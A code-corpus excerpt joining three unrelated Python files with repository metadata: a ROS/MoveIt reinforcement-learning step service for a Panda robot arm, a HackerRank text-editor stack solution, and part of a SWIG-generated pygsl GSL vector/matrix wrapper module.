from sensor_msgs.msg import JointState
from gazebo_msgs.msg import LinkStates
from gazebo_msgs.msg import LinkState
from std_msgs.msg import Float64
from std_msgs.msg import String
from sensor_msgs.msg import Joy
import moveit_commander
from panda_rl.srv import StepAction, StepActionResponse
# moveit_commander and the ROS node must be initialised before a
# MoveGroupCommander can be constructed
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('step_service', anonymous=False)
group_name = "panda_arm_hand"
move_group = moveit_commander.MoveGroupCommander(group_name)
quat_goal = np.array([1, 0, 0.0075, 0])
def vector2points(v, u):
v = np.array(v)
u = np.array(u)
vector = u - v
vector = np.round(vector, 5)
return vector
def get_hand_position():
msg = rospy.wait_for_message('/gazebo/link_states', LinkStates)
hand_positionx = (msg.pose[9].position.x + msg.pose[10].position.x) / 2
hand_positiony = (msg.pose[9].position.y + msg.pose[10].position.y) / 2
hand_positionz = (msg.pose[9].position.z + msg.pose[10].position.z) / 2
hand_position = [hand_positionx, hand_positiony, hand_positionz]
hand_position = np.round(hand_position, 5)
return hand_position
def get_hand_orientation():
msg = rospy.wait_for_message('/gazebo/link_states', LinkStates)
hand_orientation_x = (msg.pose[9].orientation.x + msg.pose[10].orientation.x) / 2
hand_orientation_y = (msg.pose[9].orientation.y + msg.pose[10].orientation.y) / 2
hand_orientation_z = (msg.pose[9].orientation.z + msg.pose[10].orientation.z) / 2
hand_orientation_w = (msg.pose[9].orientation.w + msg.pose[10].orientation.w) / 2
hand_orientation = [hand_orientation_x, hand_orientation_y, hand_orientation_z, hand_orientation_w]
hand_orientation = np.round(hand_orientation, 5)
return hand_orientation
def goal_distance(x, y):
x = np.array(x)
y = np.array(y)
distance = np.linalg.norm(x-y)
distance = np.round(distance, 5)
return distance
def take_action(msg):
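    # each action component is treated as a joint-angle delta, scaled by
    # 1/20 so a single step only moves the arm a small amount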
done = False
goal = msg.goal
joint_state = move_group.get_current_joint_values()
joint_state[0] = joint_state[0] + (msg.action[0] / 20)
joint_state[1] = joint_state[1] + (msg.action[1] / 20)
joint_state[2] = joint_state[2] + (msg.action[2] / 20)
joint_state[3] = joint_state[3] + (msg.action[3] / 20)
joint_state[4] = joint_state[4] + (msg.action[4] / 20)
joint_state[5] = joint_state[5] + (msg.action[5] / 20)
joint_state[7] = 0.04
joint_state[8] = 0.04
if joint_state[0] < joint1_threshold_min or joint_state[0] > joint1_threshold_max \
or joint_state[1] < joint2_threshold_min or joint_state[1] > joint2_threshold_max \
or joint_state[2] < joint3_threshold_min or joint_state[2] > joint3_threshold_max \
or joint_state[3] < joint4_threshold_min or joint_state[3] > joint4_threshold_max \
or joint_state[4] < joint5_threshold_min or joint_state[4] > joint5_threshold_max \
or joint_state[5] < joint6_threshold_min or joint_state[5] > joint6_threshold_max:
hand_position = get_hand_position()
vector = vector2points(hand_position, goal)
obs = joint_state[0:7]
obs = np.round(obs, 5)
obs = np.append(obs, vector)
done = True
reward = -50
return StepActionResponse(obs=obs, reward=reward, done=done)
else:
move_group.go(joint_state, wait=True)
move_group.stop()
joint_state = move_group.get_current_joint_values()
obs = joint_state[0:7]
obs = np.round(obs, 5)
hand_position = get_hand_position()
quat = get_hand_orientation()
quat_reward = np.linalg.norm(quat_goal - quat)
d = goal_distance(hand_position, goal)
vector = vector2points(hand_position, goal)
z = hand_position[2] - goal[2]
obs = np.append(obs, vector)
if d < 0.02 and z > 0:
reward = 0
print("Action: ", msg.action)
print("Handpos: ", hand_position)
print("Goal: ", goal)
print("Observation ", obs)
print("reward target reached: ", reward)
done = True
group_name_gripper = "hand"
move_group_gripper = moveit_commander.MoveGroupCommander(group_name_gripper)
joint_values = move_group_gripper.get_current_joint_values()
joint_values[0] = 0.02
joint_values[1] = 0.02
move_group_gripper.go(joint_values, wait=True)
move_group_gripper.stop()
return StepActionResponse(obs=obs, reward=reward, done=done)
        elif d > 0.08 and z < 0.05 or z < 0:  # encourage approaching from above: penalise when the EE is far away but already at a height similar to the goal, or below it
reward = 5 * (-d - quat_reward)
return StepActionResponse(obs=obs, reward=reward, done=done)
else:
reward = (-d - quat_reward)
#print("Action: ", msg.action)
print("Handpos: ", hand_position)
print("Goal: ", goal)
#print("Observation ", obs)
print("reward: ", reward)
print("Distance", d)
return StepActionResponse(obs=obs, reward=reward, done=done)
joint1_threshold_min = -2.8973
joint2_threshold_min = -1.7628
joint3_threshold_min = -2.8973
joint4_threshold_min = -3.0718
joint5_threshold_min = -2.8973
joint6_threshold_min = -0.0175
joint1_threshold_max = 2.8973
joint2_threshold_max = 1.7628
joint3_threshold_max = 2.8973
joint4_threshold_max = -0.0698
joint5_threshold_max = 2.8973
joint6_threshold_max = 3.7525
print("step_node active")
s = rospy.Service('step_env', StepAction, take_action)
rospy.spin()
| 35.429448 | 151 | 0.675152 |
3fa22069ae5fe18f29c6332040788c47fba607ea
| 469 |
py
|
Python
|
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
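# HackerRank "Simple Text Editor": op 1 appends a string, op 2 deletes the
# last k characters, op 3 prints the k-th character, op 4 undoes the last
# edit; the stack keeps every previous state of S for the undo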
N = int(raw_input())
S = ''
stack = [S]
for _ in xrange(N):
s = raw_input()
if s.startswith('1'):
S = ''.join((S, s.split()[-1]))
stack.append(S)
elif s.startswith('2'):
k = int(s.split()[-1])
S = S[:-k]
stack.append(S)
elif s.startswith('3'):
k = int(s.split()[-1])
index = k-1
print S[index]
elif s.startswith('4'):
stack.pop()
S = stack[-1]
| 19.541667 | 39 | 0.447761 |
b79b05e86bdffa34c0cb47c7868d179ea550149c
| 50,505 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('__block', [dirname(__file__)])
except ImportError:
import __block
return __block
if fp is not None:
try:
_mod = imp.load_module('__block', fp, pathname, description)
finally:
fp.close()
return _mod
__block = swig_import_helper()
del swig_import_helper
else:
import __block
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def gsl_vector_set_zero(*args, **kwargs):
return __block.gsl_vector_set_zero(*args, **kwargs)
gsl_vector_set_zero = __block.gsl_vector_set_zero
def gsl_vector_set_all(*args, **kwargs):
return __block.gsl_vector_set_all(*args, **kwargs)
gsl_vector_set_all = __block.gsl_vector_set_all
def gsl_vector_set_basis(*args, **kwargs):
return __block.gsl_vector_set_basis(*args, **kwargs)
gsl_vector_set_basis = __block.gsl_vector_set_basis
def gsl_vector_fread(*args, **kwargs):
return __block.gsl_vector_fread(*args, **kwargs)
gsl_vector_fread = __block.gsl_vector_fread
def gsl_vector_fwrite(*args, **kwargs):
return __block.gsl_vector_fwrite(*args, **kwargs)
gsl_vector_fwrite = __block.gsl_vector_fwrite
def gsl_vector_fscanf(*args, **kwargs):
return __block.gsl_vector_fscanf(*args, **kwargs)
gsl_vector_fscanf = __block.gsl_vector_fscanf
def gsl_vector_fprintf(*args, **kwargs):
return __block.gsl_vector_fprintf(*args, **kwargs)
gsl_vector_fprintf = __block.gsl_vector_fprintf
def gsl_vector_reverse(*args, **kwargs):
return __block.gsl_vector_reverse(*args, **kwargs)
gsl_vector_reverse = __block.gsl_vector_reverse
def gsl_vector_swap(*args, **kwargs):
return __block.gsl_vector_swap(*args, **kwargs)
gsl_vector_swap = __block.gsl_vector_swap
def gsl_vector_swap_elements(*args, **kwargs):
return __block.gsl_vector_swap_elements(*args, **kwargs)
gsl_vector_swap_elements = __block.gsl_vector_swap_elements
def gsl_vector_max(*args, **kwargs):
return __block.gsl_vector_max(*args, **kwargs)
gsl_vector_max = __block.gsl_vector_max
def gsl_vector_min(*args, **kwargs):
return __block.gsl_vector_min(*args, **kwargs)
gsl_vector_min = __block.gsl_vector_min
def gsl_vector_minmax(*args, **kwargs):
return __block.gsl_vector_minmax(*args, **kwargs)
gsl_vector_minmax = __block.gsl_vector_minmax
def gsl_vector_max_index(*args, **kwargs):
return __block.gsl_vector_max_index(*args, **kwargs)
gsl_vector_max_index = __block.gsl_vector_max_index
def gsl_vector_min_index(*args, **kwargs):
return __block.gsl_vector_min_index(*args, **kwargs)
gsl_vector_min_index = __block.gsl_vector_min_index
def gsl_vector_minmax_index(*args, **kwargs):
return __block.gsl_vector_minmax_index(*args, **kwargs)
gsl_vector_minmax_index = __block.gsl_vector_minmax_index
def gsl_vector_isnull(*args, **kwargs):
return __block.gsl_vector_isnull(*args, **kwargs)
gsl_vector_isnull = __block.gsl_vector_isnull
def gsl_matrix_set_zero(*args, **kwargs):
return __block.gsl_matrix_set_zero(*args, **kwargs)
gsl_matrix_set_zero = __block.gsl_matrix_set_zero
def gsl_matrix_set_all(*args, **kwargs):
return __block.gsl_matrix_set_all(*args, **kwargs)
gsl_matrix_set_all = __block.gsl_matrix_set_all
def gsl_matrix_set_identity(*args, **kwargs):
return __block.gsl_matrix_set_identity(*args, **kwargs)
gsl_matrix_set_identity = __block.gsl_matrix_set_identity
def gsl_matrix_fread(*args, **kwargs):
return __block.gsl_matrix_fread(*args, **kwargs)
gsl_matrix_fread = __block.gsl_matrix_fread
def gsl_matrix_fwrite(*args, **kwargs):
return __block.gsl_matrix_fwrite(*args, **kwargs)
gsl_matrix_fwrite = __block.gsl_matrix_fwrite
def gsl_matrix_fscanf(*args, **kwargs):
return __block.gsl_matrix_fscanf(*args, **kwargs)
gsl_matrix_fscanf = __block.gsl_matrix_fscanf
def gsl_matrix_fprintf(*args, **kwargs):
return __block.gsl_matrix_fprintf(*args, **kwargs)
gsl_matrix_fprintf = __block.gsl_matrix_fprintf
def gsl_matrix_swap(*args, **kwargs):
return __block.gsl_matrix_swap(*args, **kwargs)
gsl_matrix_swap = __block.gsl_matrix_swap
def gsl_matrix_swap_rows(*args, **kwargs):
return __block.gsl_matrix_swap_rows(*args, **kwargs)
gsl_matrix_swap_rows = __block.gsl_matrix_swap_rows
def gsl_matrix_swap_columns(*args, **kwargs):
return __block.gsl_matrix_swap_columns(*args, **kwargs)
gsl_matrix_swap_columns = __block.gsl_matrix_swap_columns
def gsl_matrix_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_swap_rowcol(*args, **kwargs)
gsl_matrix_swap_rowcol = __block.gsl_matrix_swap_rowcol
def gsl_matrix_transpose(*args, **kwargs):
return __block.gsl_matrix_transpose(*args, **kwargs)
gsl_matrix_transpose = __block.gsl_matrix_transpose
def gsl_matrix_max(*args, **kwargs):
return __block.gsl_matrix_max(*args, **kwargs)
gsl_matrix_max = __block.gsl_matrix_max
def gsl_matrix_min(*args, **kwargs):
return __block.gsl_matrix_min(*args, **kwargs)
gsl_matrix_min = __block.gsl_matrix_min
def gsl_matrix_minmax(*args, **kwargs):
return __block.gsl_matrix_minmax(*args, **kwargs)
gsl_matrix_minmax = __block.gsl_matrix_minmax
def gsl_matrix_max_index(*args, **kwargs):
return __block.gsl_matrix_max_index(*args, **kwargs)
gsl_matrix_max_index = __block.gsl_matrix_max_index
def gsl_matrix_min_index(*args, **kwargs):
return __block.gsl_matrix_min_index(*args, **kwargs)
gsl_matrix_min_index = __block.gsl_matrix_min_index
def gsl_matrix_minmax_index(*args, **kwargs):
return __block.gsl_matrix_minmax_index(*args, **kwargs)
gsl_matrix_minmax_index = __block.gsl_matrix_minmax_index
def gsl_matrix_isnull(*args, **kwargs):
return __block.gsl_matrix_isnull(*args, **kwargs)
gsl_matrix_isnull = __block.gsl_matrix_isnull
def gsl_matrix_diagonal(*args, **kwargs):
return __block.gsl_matrix_diagonal(*args, **kwargs)
gsl_matrix_diagonal = __block.gsl_matrix_diagonal
def gsl_matrix_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_subdiagonal(*args, **kwargs)
gsl_matrix_subdiagonal = __block.gsl_matrix_subdiagonal
def gsl_matrix_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_superdiagonal(*args, **kwargs)
gsl_matrix_superdiagonal = __block.gsl_matrix_superdiagonal
def gsl_vector_float_set_zero(*args, **kwargs):
return __block.gsl_vector_float_set_zero(*args, **kwargs)
gsl_vector_float_set_zero = __block.gsl_vector_float_set_zero
def gsl_vector_float_set_all(*args, **kwargs):
return __block.gsl_vector_float_set_all(*args, **kwargs)
gsl_vector_float_set_all = __block.gsl_vector_float_set_all
def gsl_vector_float_set_basis(*args, **kwargs):
return __block.gsl_vector_float_set_basis(*args, **kwargs)
gsl_vector_float_set_basis = __block.gsl_vector_float_set_basis
def gsl_vector_float_fread(*args, **kwargs):
return __block.gsl_vector_float_fread(*args, **kwargs)
gsl_vector_float_fread = __block.gsl_vector_float_fread
def gsl_vector_float_fwrite(*args, **kwargs):
return __block.gsl_vector_float_fwrite(*args, **kwargs)
gsl_vector_float_fwrite = __block.gsl_vector_float_fwrite
def gsl_vector_float_fscanf(*args, **kwargs):
return __block.gsl_vector_float_fscanf(*args, **kwargs)
gsl_vector_float_fscanf = __block.gsl_vector_float_fscanf
def gsl_vector_float_fprintf(*args, **kwargs):
return __block.gsl_vector_float_fprintf(*args, **kwargs)
gsl_vector_float_fprintf = __block.gsl_vector_float_fprintf
def gsl_vector_float_reverse(*args, **kwargs):
return __block.gsl_vector_float_reverse(*args, **kwargs)
gsl_vector_float_reverse = __block.gsl_vector_float_reverse
def gsl_vector_float_swap(*args, **kwargs):
return __block.gsl_vector_float_swap(*args, **kwargs)
gsl_vector_float_swap = __block.gsl_vector_float_swap
def gsl_vector_float_swap_elements(*args, **kwargs):
return __block.gsl_vector_float_swap_elements(*args, **kwargs)
gsl_vector_float_swap_elements = __block.gsl_vector_float_swap_elements
def gsl_vector_float_max(*args, **kwargs):
return __block.gsl_vector_float_max(*args, **kwargs)
gsl_vector_float_max = __block.gsl_vector_float_max
def gsl_vector_float_min(*args, **kwargs):
return __block.gsl_vector_float_min(*args, **kwargs)
gsl_vector_float_min = __block.gsl_vector_float_min
def gsl_vector_float_minmax(*args, **kwargs):
return __block.gsl_vector_float_minmax(*args, **kwargs)
gsl_vector_float_minmax = __block.gsl_vector_float_minmax
def gsl_vector_float_max_index(*args, **kwargs):
return __block.gsl_vector_float_max_index(*args, **kwargs)
gsl_vector_float_max_index = __block.gsl_vector_float_max_index
def gsl_vector_float_min_index(*args, **kwargs):
return __block.gsl_vector_float_min_index(*args, **kwargs)
gsl_vector_float_min_index = __block.gsl_vector_float_min_index
def gsl_vector_float_minmax_index(*args, **kwargs):
return __block.gsl_vector_float_minmax_index(*args, **kwargs)
gsl_vector_float_minmax_index = __block.gsl_vector_float_minmax_index
def gsl_vector_float_isnull(*args, **kwargs):
return __block.gsl_vector_float_isnull(*args, **kwargs)
gsl_vector_float_isnull = __block.gsl_vector_float_isnull
def gsl_matrix_float_set_zero(*args, **kwargs):
return __block.gsl_matrix_float_set_zero(*args, **kwargs)
gsl_matrix_float_set_zero = __block.gsl_matrix_float_set_zero
def gsl_matrix_float_set_all(*args, **kwargs):
return __block.gsl_matrix_float_set_all(*args, **kwargs)
gsl_matrix_float_set_all = __block.gsl_matrix_float_set_all
def gsl_matrix_float_set_identity(*args, **kwargs):
return __block.gsl_matrix_float_set_identity(*args, **kwargs)
gsl_matrix_float_set_identity = __block.gsl_matrix_float_set_identity
def gsl_matrix_float_fread(*args, **kwargs):
return __block.gsl_matrix_float_fread(*args, **kwargs)
gsl_matrix_float_fread = __block.gsl_matrix_float_fread
def gsl_matrix_float_fwrite(*args, **kwargs):
return __block.gsl_matrix_float_fwrite(*args, **kwargs)
gsl_matrix_float_fwrite = __block.gsl_matrix_float_fwrite
def gsl_matrix_float_fscanf(*args, **kwargs):
return __block.gsl_matrix_float_fscanf(*args, **kwargs)
gsl_matrix_float_fscanf = __block.gsl_matrix_float_fscanf
def gsl_matrix_float_fprintf(*args, **kwargs):
return __block.gsl_matrix_float_fprintf(*args, **kwargs)
gsl_matrix_float_fprintf = __block.gsl_matrix_float_fprintf
def gsl_matrix_float_swap(*args, **kwargs):
return __block.gsl_matrix_float_swap(*args, **kwargs)
gsl_matrix_float_swap = __block.gsl_matrix_float_swap
def gsl_matrix_float_swap_rows(*args, **kwargs):
return __block.gsl_matrix_float_swap_rows(*args, **kwargs)
gsl_matrix_float_swap_rows = __block.gsl_matrix_float_swap_rows
def gsl_matrix_float_swap_columns(*args, **kwargs):
return __block.gsl_matrix_float_swap_columns(*args, **kwargs)
gsl_matrix_float_swap_columns = __block.gsl_matrix_float_swap_columns
def gsl_matrix_float_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_float_swap_rowcol(*args, **kwargs)
gsl_matrix_float_swap_rowcol = __block.gsl_matrix_float_swap_rowcol
def gsl_matrix_float_transpose(*args, **kwargs):
return __block.gsl_matrix_float_transpose(*args, **kwargs)
gsl_matrix_float_transpose = __block.gsl_matrix_float_transpose
def gsl_matrix_float_max(*args, **kwargs):
return __block.gsl_matrix_float_max(*args, **kwargs)
gsl_matrix_float_max = __block.gsl_matrix_float_max
def gsl_matrix_float_min(*args, **kwargs):
return __block.gsl_matrix_float_min(*args, **kwargs)
gsl_matrix_float_min = __block.gsl_matrix_float_min
def gsl_matrix_float_minmax(*args, **kwargs):
return __block.gsl_matrix_float_minmax(*args, **kwargs)
gsl_matrix_float_minmax = __block.gsl_matrix_float_minmax
def gsl_matrix_float_max_index(*args, **kwargs):
return __block.gsl_matrix_float_max_index(*args, **kwargs)
gsl_matrix_float_max_index = __block.gsl_matrix_float_max_index
def gsl_matrix_float_min_index(*args, **kwargs):
return __block.gsl_matrix_float_min_index(*args, **kwargs)
gsl_matrix_float_min_index = __block.gsl_matrix_float_min_index
def gsl_matrix_float_minmax_index(*args, **kwargs):
return __block.gsl_matrix_float_minmax_index(*args, **kwargs)
gsl_matrix_float_minmax_index = __block.gsl_matrix_float_minmax_index
def gsl_matrix_float_isnull(*args, **kwargs):
return __block.gsl_matrix_float_isnull(*args, **kwargs)
gsl_matrix_float_isnull = __block.gsl_matrix_float_isnull
def gsl_matrix_float_diagonal(*args, **kwargs):
return __block.gsl_matrix_float_diagonal(*args, **kwargs)
gsl_matrix_float_diagonal = __block.gsl_matrix_float_diagonal
def gsl_matrix_float_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_float_subdiagonal(*args, **kwargs)
gsl_matrix_float_subdiagonal = __block.gsl_matrix_float_subdiagonal
def gsl_matrix_float_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_float_superdiagonal(*args, **kwargs)
gsl_matrix_float_superdiagonal = __block.gsl_matrix_float_superdiagonal
def gsl_vector_long_set_zero(*args, **kwargs):
return __block.gsl_vector_long_set_zero(*args, **kwargs)
gsl_vector_long_set_zero = __block.gsl_vector_long_set_zero
def gsl_vector_long_set_all(*args, **kwargs):
return __block.gsl_vector_long_set_all(*args, **kwargs)
gsl_vector_long_set_all = __block.gsl_vector_long_set_all
def gsl_vector_long_set_basis(*args, **kwargs):
return __block.gsl_vector_long_set_basis(*args, **kwargs)
gsl_vector_long_set_basis = __block.gsl_vector_long_set_basis
def gsl_vector_long_fread(*args, **kwargs):
return __block.gsl_vector_long_fread(*args, **kwargs)
gsl_vector_long_fread = __block.gsl_vector_long_fread
def gsl_vector_long_fwrite(*args, **kwargs):
return __block.gsl_vector_long_fwrite(*args, **kwargs)
gsl_vector_long_fwrite = __block.gsl_vector_long_fwrite
def gsl_vector_long_fscanf(*args, **kwargs):
return __block.gsl_vector_long_fscanf(*args, **kwargs)
gsl_vector_long_fscanf = __block.gsl_vector_long_fscanf
def gsl_vector_long_fprintf(*args, **kwargs):
return __block.gsl_vector_long_fprintf(*args, **kwargs)
gsl_vector_long_fprintf = __block.gsl_vector_long_fprintf
def gsl_vector_long_reverse(*args, **kwargs):
return __block.gsl_vector_long_reverse(*args, **kwargs)
gsl_vector_long_reverse = __block.gsl_vector_long_reverse
def gsl_vector_long_swap(*args, **kwargs):
return __block.gsl_vector_long_swap(*args, **kwargs)
gsl_vector_long_swap = __block.gsl_vector_long_swap
def gsl_vector_long_swap_elements(*args, **kwargs):
return __block.gsl_vector_long_swap_elements(*args, **kwargs)
gsl_vector_long_swap_elements = __block.gsl_vector_long_swap_elements
def gsl_vector_long_max(*args, **kwargs):
return __block.gsl_vector_long_max(*args, **kwargs)
gsl_vector_long_max = __block.gsl_vector_long_max
def gsl_vector_long_min(*args, **kwargs):
return __block.gsl_vector_long_min(*args, **kwargs)
gsl_vector_long_min = __block.gsl_vector_long_min
def gsl_vector_long_minmax(*args, **kwargs):
return __block.gsl_vector_long_minmax(*args, **kwargs)
gsl_vector_long_minmax = __block.gsl_vector_long_minmax
def gsl_vector_long_max_index(*args, **kwargs):
return __block.gsl_vector_long_max_index(*args, **kwargs)
gsl_vector_long_max_index = __block.gsl_vector_long_max_index
def gsl_vector_long_min_index(*args, **kwargs):
return __block.gsl_vector_long_min_index(*args, **kwargs)
gsl_vector_long_min_index = __block.gsl_vector_long_min_index
def gsl_vector_long_minmax_index(*args, **kwargs):
return __block.gsl_vector_long_minmax_index(*args, **kwargs)
gsl_vector_long_minmax_index = __block.gsl_vector_long_minmax_index
def gsl_vector_long_isnull(*args, **kwargs):
return __block.gsl_vector_long_isnull(*args, **kwargs)
gsl_vector_long_isnull = __block.gsl_vector_long_isnull
def gsl_matrix_long_set_zero(*args, **kwargs):
return __block.gsl_matrix_long_set_zero(*args, **kwargs)
gsl_matrix_long_set_zero = __block.gsl_matrix_long_set_zero
def gsl_matrix_long_set_all(*args, **kwargs):
return __block.gsl_matrix_long_set_all(*args, **kwargs)
gsl_matrix_long_set_all = __block.gsl_matrix_long_set_all
def gsl_matrix_long_set_identity(*args, **kwargs):
return __block.gsl_matrix_long_set_identity(*args, **kwargs)
gsl_matrix_long_set_identity = __block.gsl_matrix_long_set_identity
def gsl_matrix_long_fread(*args, **kwargs):
return __block.gsl_matrix_long_fread(*args, **kwargs)
gsl_matrix_long_fread = __block.gsl_matrix_long_fread
def gsl_matrix_long_fwrite(*args, **kwargs):
return __block.gsl_matrix_long_fwrite(*args, **kwargs)
gsl_matrix_long_fwrite = __block.gsl_matrix_long_fwrite
def gsl_matrix_long_fscanf(*args, **kwargs):
return __block.gsl_matrix_long_fscanf(*args, **kwargs)
gsl_matrix_long_fscanf = __block.gsl_matrix_long_fscanf
def gsl_matrix_long_fprintf(*args, **kwargs):
return __block.gsl_matrix_long_fprintf(*args, **kwargs)
gsl_matrix_long_fprintf = __block.gsl_matrix_long_fprintf
def gsl_matrix_long_swap(*args, **kwargs):
return __block.gsl_matrix_long_swap(*args, **kwargs)
gsl_matrix_long_swap = __block.gsl_matrix_long_swap
def gsl_matrix_long_swap_rows(*args, **kwargs):
return __block.gsl_matrix_long_swap_rows(*args, **kwargs)
gsl_matrix_long_swap_rows = __block.gsl_matrix_long_swap_rows
def gsl_matrix_long_swap_columns(*args, **kwargs):
return __block.gsl_matrix_long_swap_columns(*args, **kwargs)
gsl_matrix_long_swap_columns = __block.gsl_matrix_long_swap_columns
def gsl_matrix_long_swap_rowcol(*args, **kwargs):
return __block.gsl_matrix_long_swap_rowcol(*args, **kwargs)
gsl_matrix_long_swap_rowcol = __block.gsl_matrix_long_swap_rowcol
def gsl_matrix_long_transpose(*args, **kwargs):
return __block.gsl_matrix_long_transpose(*args, **kwargs)
gsl_matrix_long_transpose = __block.gsl_matrix_long_transpose
def gsl_matrix_long_max(*args, **kwargs):
return __block.gsl_matrix_long_max(*args, **kwargs)
gsl_matrix_long_max = __block.gsl_matrix_long_max
def gsl_matrix_long_min(*args, **kwargs):
return __block.gsl_matrix_long_min(*args, **kwargs)
gsl_matrix_long_min = __block.gsl_matrix_long_min
def gsl_matrix_long_minmax(*args, **kwargs):
return __block.gsl_matrix_long_minmax(*args, **kwargs)
gsl_matrix_long_minmax = __block.gsl_matrix_long_minmax
def gsl_matrix_long_max_index(*args, **kwargs):
return __block.gsl_matrix_long_max_index(*args, **kwargs)
gsl_matrix_long_max_index = __block.gsl_matrix_long_max_index
def gsl_matrix_long_min_index(*args, **kwargs):
return __block.gsl_matrix_long_min_index(*args, **kwargs)
gsl_matrix_long_min_index = __block.gsl_matrix_long_min_index
def gsl_matrix_long_minmax_index(*args, **kwargs):
return __block.gsl_matrix_long_minmax_index(*args, **kwargs)
gsl_matrix_long_minmax_index = __block.gsl_matrix_long_minmax_index
def gsl_matrix_long_isnull(*args, **kwargs):
return __block.gsl_matrix_long_isnull(*args, **kwargs)
gsl_matrix_long_isnull = __block.gsl_matrix_long_isnull
def gsl_matrix_long_diagonal(*args, **kwargs):
return __block.gsl_matrix_long_diagonal(*args, **kwargs)
gsl_matrix_long_diagonal = __block.gsl_matrix_long_diagonal
def gsl_matrix_long_subdiagonal(*args, **kwargs):
return __block.gsl_matrix_long_subdiagonal(*args, **kwargs)
gsl_matrix_long_subdiagonal = __block.gsl_matrix_long_subdiagonal
def gsl_matrix_long_superdiagonal(*args, **kwargs):
return __block.gsl_matrix_long_superdiagonal(*args, **kwargs)
gsl_matrix_long_superdiagonal = __block.gsl_matrix_long_superdiagonal
def gsl_vector_int_set_zero(*args, **kwargs):
return __block.gsl_vector_int_set_zero(*args, **kwargs)
gsl_vector_int_set_zero = __block.gsl_vector_int_set_zero
def gsl_vector_int_set_all(*args, **kwargs):
return __block.gsl_vector_int_set_all(*args, **kwargs)
gsl_vector_int_set_all = __block.gsl_vector_int_set_all
def gsl_vector_int_set_basis(*args, **kwargs):
return __block.gsl_vector_int_set_basis(*args, **kwargs)
gsl_vector_int_set_basis = __block.gsl_vector_int_set_basis
def gsl_vector_int_fread(*args, **kwargs):
return __block.gsl_vector_int_fread(*args, **kwargs)
gsl_vector_int_fread = __block.gsl_vector_int_fread
def gsl_vector_int_fwrite(*args, **kwargs):
return __block.gsl_vector_int_fwrite(*args, **kwargs)
gsl_vector_int_fwrite = __block.gsl_vector_int_fwrite
def gsl_vector_int_fscanf(*args, **kwargs):
return __block.gsl_vector_int_fscanf(*args, **kwargs)
gsl_vector_int_fscanf = __block.gsl_vector_int_fscanf
def gsl_vector_int_fprintf(*args, **kwargs):
return __block.gsl_vector_int_fprintf(*args, **kwargs)
gsl_vector_int_fprintf = __block.gsl_vector_int_fprintf
def gsl_vector_int_reverse(*args, **kwargs):
return __block.gsl_vector_int_reverse(*args, **kwargs)
gsl_vector_int_reverse = __block.gsl_vector_int_reverse
def gsl_vector_int_swap(*args, **kwargs):
return __block.gsl_vector_int_swap(*args, **kwargs)
gsl_vector_int_swap = __block.gsl_vector_int_swap
def gsl_vector_int_swap_elements(*args, **kwargs):
return __block.gsl_vector_int_swap_elements(*args, **kwargs)
gsl_vector_int_swap_elements = __block.gsl_vector_int_swap_elements
def gsl_vector_int_max(*args, **kwargs):
return __block.gsl_vector_int_max(*args, **kwargs)
gsl_vector_int_max = __block.gsl_vector_int_max
def gsl_vector_int_min(*args, **kwargs):
return __block.gsl_vector_int_min(*args, **kwargs)
gsl_vector_int_min = __block.gsl_vector_int_min
def gsl_vector_int_minmax(*args, **kwargs):
return __block.gsl_vector_int_minmax(*args, **kwargs)
gsl_vector_int_minmax = __block.gsl_vector_int_minmax
def gsl_vector_int_max_index(*args, **kwargs):
return __block.gsl_vector_int_max_index(*args, **kwargs)
gsl_vector_int_max_index = __block.gsl_vector_int_max_index
def gsl_vector_int_min_index(*args, **kwargs):
return __block.gsl_vector_int_min_index(*args, **kwargs)
gsl_vector_int_min_index = __block.gsl_vector_int_min_index
def gsl_vector_int_minmax_index(*args, **kwargs):
return __block.gsl_vector_int_minmax_index(*args, **kwargs)
